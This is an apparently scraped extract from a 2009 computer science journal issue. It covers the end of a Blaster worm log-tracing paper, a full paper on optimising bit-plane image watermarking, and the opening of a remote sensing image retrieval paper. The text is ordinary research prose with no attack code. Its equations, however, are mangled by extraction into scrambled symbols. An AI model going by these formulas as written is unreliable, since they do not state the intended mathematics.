algorithm as in Figure 3 for each log which is based on
fingerprint of Blaster attack on victim logs, attackers logs
and IDS alert log. This tracing technique is primarily used
signature-based technique and later on the researchers
intend to merge it with anomaly-based technique to improve
the tracing capability. All of these logs are interconnected
from one log to another log to provide more complete
coverage of the attack space information. Further
improvement should be done on generalising the process of
detecting the worm attack that will produce attack and trace
pattern for alert correlation and computer forensic
investigation research.
VI. REFERENCES
[1]. Bailey, M., Cooke, E., Jahanian, F., Watson, D., &Nazario, J. (2005). The Blaster Worm: Then and Now.IEEE Computer Society
[2]. Crandall, J. R., Ensafi, R., Forrest, S., Ladau, J., &Shebaro, B. (2008). The Ecology of Malware. ACM .
[3]. Foster, A. L. (2004). Colleges Brace for the NextWorm. The Chronicle of Higher Education, 50 (28),A29.
[4]. Okazaki, Y., Sato, I., & Goto, S. (2002). A NewIntrusion Detection Method based on Process Profiling.Paper presented at the Symposium on Applications andthe Internet (SAINT '02) IEEE.
[5]. Sekar, R., Gupta, A., Frullo, J., Shanbhag, T., Tiware,A., & Yang, H. (2002). Specification-based AnomalyDetection: A New Approach for DetectingNetwork Intrusions. Paper presented at the ACM Computer andCommunication Security Conference.
[6]. Ko, C., Ruschitzka, M., & Levitt, K. (1997). Executionmonitoring of security critical programs in distributedsystems: A Specification-based Approach. Paperpresented at the IEEE Symposium on Security andPrivacy.
[7]. Bashah, N., Shanmugam, I. B., & Ahmed, A. M.(2005). Hybrid Intelligent Intrusion Detection System.Paper presented at the World Academy of Science,Engineering and Technology, June 2005.
[8]. Garcia-Teodoro, P., E.Diaz-Verdejo, J., Marcia-Fernandez, G., & Sanchez-Casad, L. (2007). Network-based Hybrid Intrusion Detection Honeysystems asActive Reaction Schemes. IJCSNS InternationalJournal of Computer Science and Network Security,7(10, October 2007).
[9]. Adelstein, F., Stillerman, M., & Kozen, D. (2002).Malicious Code Detection For Open Firmware. Paper
7 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 14/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 , 2009
presented at the 18th Annual Computer SecurityApplications Conference (ACSAC '02), IEEE
[10]. Poolsapassit, N., & Ray, I. (2007). InvestigatingComputer Attacks using Attack Trees. Advances inDigital Forensics III, 242, 331-343.
[11]. Yusof, R., Selamat, S. R., & Sahib, S. (2008).Intrusion Alert Correlation Technique Analysis forHeterogeneous Log. IJCSNS International Journal of
Computer Science and Network Security, 8(9)[12]. Kao, D.-Y., Wang, S.-J., Huang, F. F.-Y., Bhatia,
S., & Gupta, S. (2008). Dataset Analysis of Proxy LogsDetecting to Curb Propagations in Network Attacks.Paper presented at the ISI 2008 Workshops.
[13]. Lincoln Lab, M. (1999). 1999 DARPA IntrusionDetection Evaluation Plan [Electronic Version].
[14]. McAfee. (2003). Virus Profile:W32/Lovsan.worm.a [Electronic Version]. Retrieved23/7/09 fromhttp://home.mcafee.com/VirusInfo/VirusProfile.aspx?k ey=100547.
[15]. Microsoft. (2003). Virus alert about the Blaster
worm and its variants [Electronic Version]. Retrieved23/7/09 from http://support.microsoft.com/kb/826955.
[16]. Symantec. (2003). W32.Blaster.Worm [ElectronicVersion]. Retrieved 23/7/09 fromhttp://www.symantec.com/security_response/writeup.jsp?docid=2003-081113-0229-99
8 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 15/215
(IJCSIS) International Journal of Computer Science and Information Security,Vol. 4, Aug 2009
Optimization of Bit Plane Combination for Efficient
Digital Image Watermarking Sushma Kejgir
Department of Electronics and Telecommunication Engg.
SGGS Institute of Engineering and Technology, Vishnupuri, Nanded, Maharashtra, India.
sbdabade@yahoo.co.in
Manesh Kokare Department of Electronics and Telecommunication Engg.
SGGS Institute of Engineering and Technology, Vishnupuri, Nanded, Maharashtra, India.
mbkokare@sggs.ac.in
Abstract: In view of the frequent multimedia data
transfer authentication and protection of images has
gained importance in today’s world. In this paper we
propose a new watermarking technique, based on bit
plane, which enhances robustness and capacity of the
watermark, as well as maintains transparency of the
watermark and fidelity of the image. In the proposed
technique, higher strength bit plane of digital signature
watermark is embedded in to a significant bit plane of the original image. The combination of bit planes (image
and watermark) selection is an important issue.
Therefore, a mechanism is developed for appropriate bit
plane selection. Ten different attacks are selected to test
different alternatives. These attacks are given different
weightings as appropriate to user requirement. A
weighted correlation coefficient for retrieved watermark
is estimated for each of the alternatives. Based on these
estimated values optimal bit plane combination is
identified for a given user requirement. The proposed
method is found to be useful for authentication and to
prove legal ownership. We observed better results by
our proposed method in comparison with the previously
reported work on pseudorandom watermark embedded
in least significant bit (LSB) plane.
Keywords: Digital signature watermark, Bit plane
watermark embedding method, Correlation coefficient,
weighted correlation coefficient.
I. INTRODUCTION:
A. Motivation:
Watermarking is an important protection and
identification technique in which an invisible mark is hidden
in the multimedia information such as audio, image, video,
or text. It has been developed to protect digital signal
(information) against illegal reproduction, modifications.
The watermarking is also useful to prove legal ownership
and authentication. A good fidelity transparent
watermarking provides the watermark imperceptible to
human visual system (HVS) that is human-eye cannot
distinguish the original data from the watermarked data.
In the past literature on watermarking it is observed
that bit plane method is one of the recommended methods of
watermarking in spatial domain. This method is
characterized by spread spectrum and is blind while
watermark retrieval. Optimal implementation of this method
maximizes the fidelity and robustness against different
attacks. This method is based on the fact that the least
significant bit plane of the image does not contain visually
significant information. Therefore it can be easily replaced
with watermark bits without affecting the quality of original
image. However the survival of the watermark is an openissue and two main drawbacks of inserting watermark in
least significant and most significant bits are:
• If watermark is inserted in least significant bit planes
then the watermark may not survive against coding,
channel noise, mild filtering or random bit-flipping.
• On the other hand, if the watermark is embedded in
most significant bit plane, watermark survives but
image quality is degraded.
Therefore, to get optimal results, in terms of fidelity,
robustness, and high embedding capacity, a new bit plane
modification method is proposed in this paper.
B.
Our Approach:To overcome above problems, we propose the novel
method for image watermarking. Proposed method differs in
two different ways than the earlier technique of bit plane
watermarking. Firstly, to prove the ownership or identify the
owner, most effective digital signature watermark is
embedded instead of pseudorandom watermark. Secondly,
instead of LSB, a previous bit to LSB is identified for
watermark embedding to avoid the degradation of image
and to survive the watermark after different general attacks
like coding, channel noise, mild filtering or random bit-
flipping. The advantages of the proposed method are
summarized as follows.
• Proposed approach is optimal.
• Maximizes the fidelity.
• Maximizes the robustness against different attacks.
• Proposed method is having more payload capacity.
The rest of the paper is organized as follows: earlier
related work to bit plane method is discussed in section 2.
The proposed significant bit plane modification
watermarking algorithm is discussed in section 3. The
experimental results are presented in section 4, which is
followed by conclusion and future scope in section 5.
9 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 16/215
(IJCSIS) International Journal of Computer Science and Information Security,Vol. 4, Aug 2009
II. RELATED WORK
Sedaaghi and Yousefi [1] embedded the watermark in
the LSB bit plane. In this method watermark is like a noise
pattern i.e. pseudorandom pattern. The main disadvantage of
this technique is that correlation coefficient (CRC) is very
small. This shows that this method cannot withstand against
attacks such as channel noise (small changes), bit flipping,
etc. Yeh and Kuo [2] proposed bit plane manipulation of the
LSB method and used quasi m-arrays instead of
pseudorandom noise as a watermark. Here, watermark is
recovered after the quantization and channel noise attacks.
Gerhard et al. [3] discussed pseudorandom LSB
watermarking, and highlighted the related work [4-8] where
in LSB modifications are employed. They commented that
LSB modification method is less robust and not much
transparent.
In [9], two watermarking algorithms (LSB and discrete
wavelet transform) are discussed by Xiao and Xiao. PSNR
of LSB is reported to be higher i.e. 55.57 db. An
experimental comparison for both against five attacks is
made. LSB watermarking is reported to survive only against
cropping. The simplest spatial domain image watermarkingtechnique is to embed a watermark in the LSB of some
randomly selected pixels [10]. The watermark is actually
invisible to human eyes. However, the watermark can be
easily destroyed if the watermarked image is low-pass
filtered or JPEG compressed. In [11], advantages and
disadvantages of LSB and most significant bit (MSB)
watermarking are reported by Ren et al. To balance between
robustness and fidelity, appropriate bit selection is proposed.
Maeder and Planitz [12] demonstrated the utility of LSB
watermarking for medical images. A comparison is also
made with discrete wavelet transform based watermarking
in terms of payload. Fei et al. [13] proposed MSB-LSB
decomposition to overcome drawbacks of fragileauthentication systems. However the use of LSB makes the
system vulnerable to attacks. Kumsawat et al. [14] proposed
the spread spectrum image watermarking algorithm using
the discrete multiwavelet transform.
A threshold value is used for embedding the watermark
strength to improve the visual quality of watermarked
images and the robustness of the watermark. Chen and
Leung [15] presented a technique for image watermarking
based on chaos theory. Chaotic parameter modulation (CPM)
is employed to modulate the copyright information into the
bifurcating parameter of a chaotic system. Chaotic
watermark is only a random bits, the problem of ownership
identification is still unsolved. Cox et al. [16] advocated that
a watermark should be constructed as an independent and
identically distributed (i.i.d.) Gaussian random vector that is
imperceptibly inserted in a spread-spectrum-like fashion
into the perceptually most significant spectral components
of the data. They argued that insertion of a watermark under
this regime makes the watermark robust to signal processing
operations (such as lossy compression, filtering, digital-
analog and analog-digital conversion, re-quantization, etc.),
and common geometric transformations (such as cropping,
scaling, translation, and rotation) provided that the original
image is available and that it can be successfully registered
against the transformed watermarked image. Ghouti et al.
[17] proposed a spread-spectrum communications
watermark embedding scheme to achieve watermark
robustness. The optimal bounds for the embedding capacity
are derived using a statistical model for balanced
multiwavelet coefficients of the host image. The statistical
model is based on a generalized Gaussian distribution.BMW decomposition could be used constructively to
achieve higher data-hiding Capacities. Bit error rate is
graphically represented and not tested against geometric
attacks.
III . PROPOSED WATERMARKING ALGORITHM
Watermark embedding process and extraction process
are shown in Fig. 1 and 2 respectively.
The proposed method is simple to apply, robust to
different attacks and, has good fidelity to HVS. Broadly, in
this method, original image and watermark are decomposedin to bit planes. Combinations of significant bit planes are
searched to obtain optimal bit plane combination. Finally,
using the identified bit planes watermarking is carried out.
A. Watermark Embedding and Retrieval:
In this proposed method, let ),( nm X be the grey level
image and ),( nmW be the original digital signature
Fig. 1 Watermark embedding process
Reconstruction of
watermarked image
(binary to gray)
Evolve the optimal
combination of originalimage and high strength
watermark bit planes.
Original
Image
Decomposition
of image in to
binary 8 bit
planes
Decomposition
of watermark in
to binary 8 bit
planes
Resize
watermark
= Original
image size
Attacks
Attacked
image
Digital
signature
Watermark
10 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 17/215
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 18/215
(IJCSIS) International Journal of Computer Science and Information Security,Vol. 4, Aug 2009
attacks. In this step, watermarked image is subjected to ten
different types of attacks, leading to attacked image:
}10,....,2,1{),,(* attacksdifferent inm I i ∈
Attacked image ),(*
nm I i :
)4(),(....,),........,(),,(),(**
2** nm I nm I nm I nm I iii =
Step 5: Watermark Retrieval: In this step attacked image
),(*
nm I i is again transformed in to binary image i. e. 8-bit
planes as shown below.
)5(),(............),(),(),(*
8*
2*
1*
nm I nm I nm I nm I ibibibil +++=
Extract the watermark bit plane from the attacked image.
This retrieved watermark, after attack, is denoted as
),(*1 nmW ib .
Step 6: Computation of CRC: Correlation coefficient
between retrieved watermark and original watermark is
estimated using a standard equation (6). The estimated
correlation coefficients are denoted as ),( k l CRC i . Where, I
indicate different attacks, l is taken as 7th and 8th bit planes
of original image as selected in step 3 and k denotes the bit
planes of watermark from 1 to 8. The quality of
1st
bit plane embedding 2nd
bit plane embedding
7th
bit plane embedding
3rd
bit plane embedding 4th
bit plane embedding
5th
bit plane embedding 6th
bit plane embedding 8th
bit plane embedding
Fig. 6 Watermarked images after embedding watermark in all eight bit planes of image
1st
bit plane(MSB) 2nd
bit plane
7th
bit plane
3rd
bit plane 4th
bit plane
5th
bit plane 6th
bit plane 8th
bit plane (LSB)
Fig. 5 Decomposed original image in to eight bit planes.
12 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 19/215
(IJCSIS) International Journal of Computer Science and Information Security,Vol. 4, Aug 2009
watermarked image is observed by HVS. CRC varies
between 0 and 1. CRC is defined as given below:
)6(
),(),(
),(),(
256
1
256
1
*256
1
256
1
256
1
*256
1
∑ ∑∑∑
∑ ×∑=
= ===
==
m mnn
mn
nmW nmW
nmW nmW
CRC
)7(,1
,0),(
=
ing watermark robust highly
ing watermark robust lessk l CRC if i
Step 7: Estimation of peak signal to noise ratio (PSNR):
PSNR is calculated by using following equation. Capacity
of the original image to carry the watermark is computed by
measuring PSNR, which is defined as follows:
)8()()255(
log102
10db
MSE PSNR =
Mean square error is defined as:
)9()),(),(()(
1 2256
1
*256
1 ∑ −∑×= == mnnmW nmW nmMSE
Where ),( nmW is the original watermark, ),(* nmW is the
extracted watermark after attack.
Step 8: Weighted correlation coefficient computation:
Fig 7. Result of retrieved watermarks after different attacks for Existing method (8h
bit plane of original
image replaced with 8th bit plane of pseudorandom watermark)
Watermarked image (8h bit
image-8th pseudorandom
watermark )
Original pseudo-random
watermark
1. Retrieval of watermark
after angle rotation attack
2. Retrieval of watermark
after rotate transform
attack
5. Retrieval of
watermark after
quantization attack
3. Retrieval of watermark
after cropping of 41%
attack
4. Retrieval of watermark
after low pass filter attack
6. Retrieval of watermark
after translation motion
attack
8 Retrieval of watermark
after salt pepper
attack
7. Retrieval of watermark
after contrast stretching
attack
9. Retrieval of watermark
after compression
attack
10. Retrieval of
watermark after shrinking
attack
13 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 20/215
(IJCSIS) International Journal of Computer Science and Information Security,Vol. 4, Aug 2009
Weighted correlation coefficient is defined as follows:
)10(),(),(.10
1ii
i
ak l CRC k l CRC Wt ×∑==
Where, ai are the different weightings of attacks such that
total 11021 =+−−−−++= aaaai , and i is the number of attacks.
The identified attacks are assigned weightings based on
damage caused, frequency, intensity and criticality or any
other such criterion by the user. Based on these weightings,
considering all the ten attacks, weighted correlation
coefficient are estimated, for each bit plane combination of
image and watermark under consideration. The step is
repeated for combinations of selected bit planes of image
and the entire bit planes of watermark respectively.
Step 9: Optimization: The above step 8 is repeated by
varying the weightings of attacks. The bit plane combination
of original image and watermark for which, the weighted
correlation coefficient is maximum, is selected as the
optimized one for the given user requirements. This
combination is used for optimized watermarking in terms of
robustness and fidelity.
Watermarked Image (7th bit
image-1st
digital signature
watermark )
Original digital signature
watermark
1. Retrieval of watermark
after angle rotation attack
2. Retrieval of watermark
after rotate transform attack
6. Retrieval of watermark
after translation motion
attack
3. Retrieval of watermark
after cropping of 41% attack
5. Retrieval of watermark
after quantization attack
4. Retrieval of watermark
after low pass filter attack
8 Retrieval of watermark
after salt pepper attack
9. Retrieval of watermark
after compression attack
10. Retrieval of watermark
after shrinking attack
7. Retrieval of watermark
after contrast stretching attack
Fig 8. Result of retrieved watermarks after different attacks, for proposed method (7th
bit plane of original
image replaced with 1th
bit plane of digital signature watermark).
14 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 21/215
(IJCSIS) International Journal of Computer Science and Information Security,Vol. 4, Aug 2009
IV. EXPERIMENTAL RESULTS
We have implemented our method on still grey scale
image (dimension 256256 × ). In the subsections to follow
extensive analysis is carried out to evolve the optimal
combination of bit planes (image and watermark) to achieve
desirable properties after watermarking.
A. Fidelity Checked by HVS
The results are displayed in Fig. 7, 8, 9, and 10. Each of
these figures display watermarked image, original
watermark, and retrieved watermark after different attacks.
All these figures exhibit fidelity of watermarked image and
survival of watermark after attacks.
For comparison original watermark is presented for
each combination of the bit planes. Through these figures
fidelity of watermarked image and survival of watermark
after different attacks can be visually checked for the
various combinations of image and watermark bit plane. Fig.
7 displays the results of existing method [1] (LSB,
pseudorandom watermark embedding).
Here, the watermark survives after seven different types of
attacks out of ten. The retrieved watermark visually appears
same as the original watermark, but automated correlation
coefficient (standard method) is very small. This indicates
that retrieved watermark is not similar to the original
watermark. Fig. 8 shows the result of the combination, 1st
bit plane of watermark embedded in 7th bit plane of original
Fig 9. Result of retrieved watermarks after different attacks, for comparison purpose to proposed method (8th bit
plane of original image replaced with 8th
bit plane of digital signature watermark).
Watermarked Image (8th
bitimage-8
thdigital signature
watermark )
1. Retrieval of watermark
after angle rotation attack
2. Retrieval of watermark
after rotate transform attack
Original digital signature
watermark
5. Retrieval of watermark after quantization attack
3. Retrieval of watermark after cropping of 41% attack
4. Retrieval of watermark after low pass filter attack
6. Retrieval of watermark after translation motion
attack
8 Retrieval of watermark after salt -pepper attack
7. Retrieval of watermark after contrast stretching attack
9. Retrieval of watermark after compression attack
10. Retrieval of watermark after shrinking attack
15 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 22/215
(IJCSIS) International Journal of Computer Science and Information Security,Vol. 4, Aug 2009
image, which shows survival of watermark against seven
different attacks with good fidelity of watermarked image.
Fig. 9 shows the results for other combination of bit planes
(for example, 8th bit plane digital signature watermark
embedded in 8th
bit plane of original image). This result
shows good fidelity but watermark survival is for minimum
number of (five) attacks. Fig. 10 shows survival of
watermark is good but fidelity of watermarked image is bad
(1st bit plane watermark embedded in 1st bit plane of originalimage).
Thus, above results indicate that the bit planes
combination, i.e. 1st
bit plane of watermark embedded in 7th
bit plane of original image exhibit superiority over all other
with respect to fidelity hence recommended by the proposed
method.
B. CRC Results
CRC after different attacks and different combinations
of bit planes is compared in Fig. 11. In this, CRC is plotted
on y axis and different attacks are plotted on x axis as per
the numbers is as follows:
1. Angle rotation attack. 2. Rotate Transform attack.
3. Crop attack 41%. 4. LPF (low pass filter) attack
5. Quantization attack. 6. Translation motion attack.
7. Contrast stretching attack.8. Salt pepper attack.
9. Compression attack. 10. Shrinking attack.
CRC for different methods after different attacks, as given
in legend: pseudo 8-8 indicates pseudorandom watermark
(8th bit plane embedded in 8th bit plane), pseudo 1-1
indicates pseudorandom watermark (1st bit plane embedded
in 1st bit plane), Signature 8-8 indicates digital signature
5. Retrieval of watermark
after quantization attack
3. Retrieval of watermark after
cropping of 41% attack
4. Retrieval of watermark
after low pass filter attack
6. Retrieval of watermark
after translation motion
attack
Watermarked Image (1st bit
image-1st
digital signature
watermark )Original digital signature
watermark
1. Retrieval of watermark
after angle rotation attack
2. Retrieval of watermark
after rotate transform
attack
Fig 10. Result of retrieved watermarks after different attacks, for comparison purpose to proposed method (1 h
bit plane of original image replaced with 1 th bit plane of digital signature watermark).
8 Retrieval of watermark
after salt pepper attack
7. Retrieval of watermark after
contrast stretching attack
9. Retrieval of watermark
after compression attack
10. Retrieval of watermark
after shrinking attack
16 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 23/215
(IJCSIS) International Journal of Computer Science and Information Security,Vol. 4, Aug 2009
watermark (8th bit plane embedded in 8th bit plane), etc.
Graph shows that, for pseudo 8-8 and pseudo 1-1, CRC is
nearer to the zero line, maximum CRC for combination of
signature 1-1 but fidelity is bad for this method. The graph
also shows that CRC is at higher level for the combination
recommended by proposed method (signature 7-1). Also, for
this fidelity is good as displayed in Fig. 8.
1 2 3 4 5 6 7 8 9 100
0.1
0.2
0.3
0.4
0.5
0.6
0.7
0.8
0.9
1
Different attacks
C o r r e l a t i o n
c o e f f i c i e n t
pseudo:8-8
pseudo:1-1
signature:8-8
signature:1-1
signature:7-1
1 2 3 4 5 6 7 850
55
60
65
70
75
80
85
90
95
100
Fixed 1st bit planes of watermark & variable bit plane of image
P S N R
i n d b
Fig. 12. PSNR for combinations of different bit planes of
original image to 1st bit plane of watermark.
C. PSNR Result In addition to above, for proposed bit plane
combination watermark embedding capacity i.e. PSNR is
observed to be high (87 db). PSNR for combinations of
different bit planes of original image and 1st bit plane
(higher strength) of watermark is displayed in Fig. 12. From
this it is observed that combination of (8 th bit plane of image
and 1st bit plane of watermark) is capable for higher pay
load, but this combination is sensitive to small changes like
bit flipping and robust to less number of attacks (refer Fig.
8 , 9 and table 1). Therefore previous bit plane (7th
) of image
is good for watermarking.
Table 1. Weighted CRC for different combination of original image and watermark bit planes are given.
User
requirements
Bit
planeCombination
: com.(l, k)
1.Wt.CRC
equal
weights
for allattacks
i. e.
a1 toa10=0.1
2.Wt.CRC
a1=0.05
a2=0.05
a3=0.05a4=0.05
a5=0.05
a6=0.05a7=0.2
a8=0.2
a9=0.2
a10=0.1
3.Wt.CRC
a1=0.025
a2=0.05
a3=0.025a4=0.025
a5=0.025
a6=0.05a7=0.1
a8=0.4
a9=0.1
a10=0.2
4.Wt.CRC
a1=0.025
a2=0.025
a3=0.05a4=0.05
a5=0.05
a6=0.05a7=0.05
a8=0.2
a9=0.3
a10=0.2
Com. (7,8) 0.7854 0.8703 0.9212 0.8955
Com. (7,7) 0.7855 0.8703 0.9212 0.8955
Com. (7,6) 0.7857 0.8708 0.9220 0.8959
Com. (7,5) 0.7859 0.8713 0.9225 0.8962
Com. (7,4) 0.8106 0.8849 0.9285 0.9082
Com. (7,3) 0.8107 0.8849 0.9284 0.9081
Com. (7,2) 0.8110 0.8854 0.9291 0.9086
Com. (7,1) 0.8115 0.8861 0.9300 0.9091
Com.(8,8) 0.7855 0.8704 0.9213 0.8955
Com. (8,7) 0.7850 0.8700 0.9206 0.8950
Com. (8,6) 0.7854 0.8705 0.9215 0.8956
Com. (8,5) 0.7859 0.8712 0.9224 0.8962
Com. (8,4) 0.8108 0.8850 0.9286 0.9083
Com. (8,3) 0.8103 0.8847 0.9281 0.9078
Com. (8,2) 0.8108 0.8852 0.9289 0.9084
Com. (8,1) 0.8114 0.8859 0.9297 0.9090
D. Weighted CRC Results
In table 1, first column represents different bit plane
combinations attempted in this work for digital image
watermarking. Second column onwards represent results of
weighted CRC, for different combinations, by varying the
weightings of attacks. Here1021 ,,, aaa −−− represents different
weightings of attacks respectively.
From results shown in table 1, it can be observed that
the proposed method (1st bit plane of signature watermark
embedded in 7th bit plane original image) provides the
optimal combination yielding highest values of CRC as
highlighted in the table. The table 1 highlights, optimal bit
plane method which shows maximum robustness, in terms
of CRC, for given user requirement.
V. CONCLUSION
We observed that in previous bit plane methods
survival of watermark appears to be good but CRC is nearer
to zero level. The proposed method has the ability to
Fig 11. CRC for different attacks
17 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 24/215
(IJCSIS) International Journal of Computer Science and Information Security,Vol. 4, Aug 2009
perform better than the existing methods, based on bit plane,
as higher CRC values are achieved. Also, when
pseudorandom watermark is replaced with digital signature
watermark there is rise in CRC indicating robustness of
watermark. We observed that, in the image, the bit plane
prior to LSB also does not contain visually significant
information so it can be selectively used to optimally embed
the watermark. Referring to results shown in Table 1, it can
be concluded that proposed method leads to robustwatermarking against geometric attacks and also yields
highest correlation coefficient as compared to the previous
bit plane method and other combination of bit planes. Also,
it can be noted that PSNR value for proposed method is
higher i. e. above 87 db.
It is noted that weighted correlation coefficient is useful
to estimate the effect on the CRC, on account of change in
user environment (in terms of variation in weight of the
attack) while identifying the optimal bit plane combination.
In future, the survival of watermark against various other
different attacks can be checked.
REFERENCES
[1] M. H. Sedaaghi and S. Yousefi, “Morphological watermarking”,
IEE Electronics Letters, vol.41 no.10, pp.591-593, 12th may 2005.
[2] C. H. Yeh and C. J. Kuo, “Digital watermarking through quasi m-
arrays”, Proc.of 25th annual IEE Conf. on Industrial ElectronicsSociety, vol.1, pp.459-461, Nov.1999.
[3] G.C. Langelaar, I. Setyawan, and R. L. Lagendijk, “Watermarkingdigital image and video data”, IEEE Signal Processing Magazine,
pp.20-46, Sept 2000.
[4] R.G. van Schyndel, A.Z. Tirkel, and C.F. Osborne, “A digital
watermark,” Proc. IEEE Int. Conf. on Image Processing , vol.2, pp.86-90, Nov.1994.
[5] T. Aura, “Invisible communication,” Proc. HUT Seminar on Network Security ‘95 , Espoo, Finland, 6 Nov. 1995.
[6] T. Aura, “Practical invisibility in digital communication,” Proc. of Workshop on Information Hiding Lecture Notes in Computer Science, vol. 1174, Cambridge, U.K., pp.257-264, May 1996.
[7] K. Hirotsugu, “An image digital signature system with ZKIP for the
graph isomorphism,” Proceedings of IEEE Int. Conf. on Image Processing , vol .3, Lausanne, Switzerland, pp. 247-250, Sept. 1996.
[8] J. Fridrich and M. Goljan, “Protection of digital images using self embedding,” Proc. of Symposium on Content Security and Data
Hiding in Digital Media, New Jersey Institute of Technology, Newark, NJ, USA,pp.1259-1284, May 1999.
[9] M. Xiao, L. Yu, and C. Liua, “Comparative research of robustnessfor image watermarking”, IEEE Int. Conf. on Computer Science
and Software Engineering, pp.700-703, 2008.
[10] M. D. Swanson, M. Kohayashi, and A. Tewfik, "Multimedia data-
embedding and watermarking technologies", Proc. of' the IEEE,Vol. 86, No. 6, pp. 1064-1087, June 1998.
[11] J. Ren, T. Li and M. Nadooshan “A cryptographic watermark embedding technique”, IEEE Asilomar Conf. on Signals, Systems
and Computers, pp.382-386, 2004.
[12] A. J. Maeder and B. M. Planitz, “Medical image watermarking for multiple modalities”, 34th IEEE Proc. on Applied Imagery and
Pattern Recognition Workshop, pp.158-165, 2005.
[13] C. Fei , D. Kundur , and R. H. Kwong , “Analysis and design of secure watermark-based authentication systems”, IEEE Trans. on
Information Forensics and Security, vol.1, no.1, pp.43-55, march
2006.
[14] Prayoth Kumsawat, Kitti Attakitmongcol , and Arthit Srikaew, “A
New Approach for Optimization in Image Watermarking by UsingGenetic Algorithms”, IEEE Trans. on Signal Processing , Vol. 53,
No. 12, pp4707-4719,December 2005.
[15] Siyue Chen , and Henry Leung , “Ergodic Chaotic Parameter Modulation With Application to Digital Image Watermarking”,
IEEE Trans. on Image Processing , Vol. 14, No. 10, pp1590-1602, October 2005.
[16] Ingemar J. Cox, Joe Kilian, F. Thomson Leighton, and TalalShamoon, “Secure Spread Spectrum Watermarking for
Multimedia”, IEEE Trans. on Image Processing , Vol. 6, No. 12, pp1673-1686 , December 1997.
[17] Lahouari Ghouti , Ahmed Bouridane , Mohammad K. Ibrahim , andSaid Boussakta, “ Digital Image Watermarking Using Balanced
Multiwavelets”, IEEE Trans. on Signal Processing, Vol. 54, No. 4, pp.1519-1536, April, 2006.
Sushma Kejgir is an Assistant Professor of Department of Electronics and
Telecommunication Engineering at Shri Guru Gobind Singhji Institute of
Engineering and Technology, Vishnupuri, Nanded, India. Her
subject of interest includes digital image watermarking and
electromagnetic engineering.
Dr. Manesh Kokare, has completed his Ph.D. from the IIT, Kharagpur,
India, in 2005. He is working as a faculty member in the Department of
Electronics and Telecommunication Engineering at Shri
Guru Gobind Singhji Institute of Engineering and
Technology, Vishnupuri, Nanded, India. He has published
about 35 papers in international and national journals and
conferences. He received Career Award for Young Teachers (CAYT)
for the year 2005 from AICTE, New Delhi, India. He is a life member of
System Society of India, ISTE, and IETE and Member of IEEE, Member of
IEEE Signal Processing Society, Member of IEEE Computer Society. He is
a reviewer of fourteen international journals.
.
18 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 25/215
(IJCSIS) International Journal of Computer Science and Information Security, Vol. 4, No. 1 & 2, 2009
Retrieval of Remote Sensing Images Using
Colour & Texture AttributePriti Maheswary Dr. Namita SrivastavaResearch Scholar Assistant Professor
Department Of Computer Application Department Of Mathematics
Maulana Azad National Institute of Technology Maulana Azad National Institute of Technology
Bhopal, India Bhopal, India
pritimaheshwary@rediffmail.com sri.namita@gmail.com
Abstract - Grouping images into semantically meaningful
categories using low-level visual feature is a challenging
and important problem in content-based image retrieval.
The groupings can be used to build effective indices for animage database. Digital image analysis techniques are
being used widely in remote sensing assuming that each
terrain surface category is characterized with spectral
signature observed by remote sensors. Even with theremote sensing images of IRS data, integration of spatial
information is expected to assist and to improve the image
analysis of remote sensing data. In this paper we present
a satellite image retrieval based on a mixture of oldfashioned ideas and state of the art learning tools. We
have developed a methodology to classify remote sensing
images using HSV color features and Haar wavelet
texture features and then grouping them on the basis of
particular threshold value. The experimental resultsindicate that the use of color and texture feature
extraction is very useful for image retrieval.
Key Words: Content Based Image Retrieval; k-means clustering; colour; texture
I. INTRODUCTION
The advent of Digital photography, reduction in
cost of mass storage device and use of high-capacity
public networks have led to a rapid increase in the use
of digital images in various domains such as
publishing, media, military and education. The need to
store, manage and locate these images has become a
challenging task. Generally, there are two main
approaches for classifying images: image classification
based on keywords and the other one is content based
image retrieval. The former technique suffers from the
need for manual classification of images, which is
simply not practical in a large collection of image.
Further incompleteness of a limited set of keyword
descriptors may significantly reduce query
effectiveness at the time of image retrieval. In latter
technique images can be identified by automatic
description, which depends on their objective visual
content.
Remote Sensing Application images are depicted
using spatial distribution of a certain field parameters
such as reflectivity of (EM) radiation, emissivity,
temperature or some geophysical or topographical
elevation. We have designed a system to retrieve
similar remote sensing images using some traditional
and modern approach.
II. PREVIOUS WORK
Content Based Image Retrieval is a set of
techniques for retrieving semantically relevant images
from an image database based on automatically derivedimage features [1]. The computer must be able to
retrieve images from a database without any human
assumption on specific domain (such as texture vs. non
texture or indoor vs. outdoor).
One of the main tasks for CBIR systems is
similarity comparison, extracting feature signatures of
every image based on its pixel values and defining
rules for comparing images. These features become the
image representation for measuring similarity with
other images in the database. To compare images the
difference of the feature components is calculated.
Early CBIR methods used global feature extraction to
obtain the image descriptors. For example, QBIC [2],
developed at the IBM Almaden Research Center,
extracts several features from each image, namely
color, texture and shape features. These descriptors are
obtained globally by extracting information on the
means of color histograms for color features; global
texture information on coarseness, contrast, and
direction; and shape features about the curvature,
moments invariants, circularity, and eccentricity.
Similarly, the Photo-book-system [3], Visual-Seek [4],
and Virage [5], use global features to represent image
semantics.
